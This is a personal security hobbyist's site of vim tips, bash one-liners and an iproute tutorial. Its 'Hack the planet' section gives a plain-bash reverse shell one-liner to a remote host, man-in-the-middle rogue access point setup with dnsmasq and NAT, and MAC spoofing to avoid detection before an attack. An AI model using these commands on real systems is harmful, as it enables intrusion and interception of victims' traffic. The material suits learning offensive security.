Welcome to badc0.de

About h4cking stuff, vim tricks, tutorials and one-liners


what you can find here...

If you're interested in useful bash commands, vim basics or effeciant vim usage, you're right. This won't be a classic "blog". I will write down what I think what is useful and what I would have learned fewer. My (well-documentated) dotfiles, especially my .vimrc can be found on Github.


about me...

I'm a 29 years old security enthusiast, programmer and I love vim! In the past I successfully passed the Offensive Security Certified Professional and in near future I'm going to perform some tasks from eLearnSecurity (for fun and profit?!). Since a few years I deal with h4cking stuff and learned to use and love vim.


other projects...

A few of my other projects are DumpMe, there you can see several informations about yourself, analyzed by your digital footprint. Another project is PasswordsOnline. In the beginning it was a project I coded only for me. But friends of mine told me they're also interested in this Project, so I've published it.

fancy vim image

Do you know vim?!

/usr/bin/vim is not an editor, it's a lifestyle...

You can scroll the document without the need to move the cursor to the top/bottom: Ctrl-e to scroll down and Ctrl-y to scroll up.


Sometimes you want to open a file in read-only mode to prevent accidentally saving changes you've done on the fly. (When opening /etc/passwd, some log-files or whatever-config files for testing e.g.). Just type:

$ view /etc/passwd

The file will be opened in vim read-only and protects you from writing ;)

Advanced Searching

You might already know you can search for a string using /searchpattern. If you want to quick switch between multiple results, you can easily search (in the whole file:

:lvim "<input" % followed by: :lopen

Will open a result buffer on the bottom. In this buffer, every line represents a search result containing the filename, line number and the content of the whole line itself. You can navigate using hjkl or the cursor buttons and hit enter to switch to the top buffer to the matching line. With Ctrl-w w you can switch back to the search results.

Read More (22)...

fancy bash image

Want some bash-foo?!

Oneliners, bashfoo and other useful tricks ;)
/sbin/ip (ifconfig is deprecated)

Many of linux users are comfortable with ifconfig or route, but this tool is deprecated! The (imho better) tool is ip, which is contained in package iproute since Ubuntu 13.10 and Debian 7. I will give you a short tutorial about using /sbin/ip command.

In most parameters, one-letter abbreviation is allowed. Those commands are written as you would speak it out:

Bring interface up / down:

# Old ifconfig syntax: ifconfig eth0 up
# New ip syntax:
$ ip link set eth0 down
$ ip l s eth0 down

Assign ip address to interface:

# Old ifconfig syntax: ifconfig eth0 netmask
# New ip syntax:
$ ip addr add dev eth0
$ ip a a dev eth0

Flush interface:

# Old ifconfig syntax: ifconfig eth0
# New ip syntax:
$ ip addr flush eth0
$ ip a f eth0

Add new default route:

# Old ifconfig syntax: route add default gw eth0
# New ip syntax:
$ ip route add default via
$ ip r a default via

It might appear it is more to type, but if you work with this command a few times you will see, that it's much easier and you can be smart-ass if you see someone typing ifconfig or route :P


Simple portscan: nc -vnzw1 80

Perform a GET request to target:

echo -e "GET / HTTP/1.1\r\nHost: fritz.box\r\n\r\n" | nc 80

vi or cd

Add the following piece of code to your .bashrc

function vc {
CMDLINE=$(history 2 | head -1 | awk -F " " '{print $NF}')
[[ -d $CMDLINE ]] && cd $CMDLINE

What does this code do?!

It takes the last argument of the previous command and saves this string in variable $CMDLINE. If this string is a valid file (-f), it opens the file with the default editor (assuming your $EDITOR variable is set). If not, it checks if it's a directory, if so it changes from the current to the target directory. In my case, I named the function to vc (vim or cd) ;)

What's the usecase?!

grep stylesheet /var/www/html/mysite/subtree/index.html # Assume you want to edit the file now...
vc # Opens $EDITOR with /var/www/html/mysite/subtree/index.html
--- or ---
ls -lahtr /etc/nginx/sites-available # Assume you want to change in this directory now...
vc # Changes from the current directory to /etc/nginx/sites-available
--- or ---
cat ../../modules/database/db-connect-params.php

Read More (6)...

fancy hacking image

Hack the planet...!

Reverse-Shell Plain Bash

When you can inject system commands on a target and want to spawn a reverse-shell but no tools like perl, python, netcat or similar is available, there's a simple way to use built-ins:

bash -i >& /dev/tcp/{remote ip}/{remote port} 0>&1


If you act as a man-in-the-middle (WiFi AP, arp-spoofing, whatever) you don't want the victim to detect malicious behavior. To do so it's recommended to setup up a dns server, dhcp server and serve any network (internet e.g).

The tool dnsmasq can be used for that case. It contains a DHCP and DNS server. DNS requests are forwarded to DNS server configured in /etc/hosts and you can specify a dhcp range in one config file:


Start dnsmasq with $ dnsmasq -C dnsmasq.conf

What's missing?!

Enable routing/nat:

$ echo 1 > /proc/sys/net/ipv4/ip_forward
$ iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE


Be sure to assign a ip address from the correct network before you start dnsmasq!

You can download the example dnsmasq config file here or using wget https://badc0.de/dnsmasq.conf.

Before you hack - Change your MAC

Before you attack a target over a network, be sure that you don't reveal your correct MAC address!

$ macchanger -r eth0

Your actual MAC address keeps unchanged, after a reboot the settings are restored. If you want to avoid rebooting your machine, type:

$ macchanger -p eth0

Read More (7)...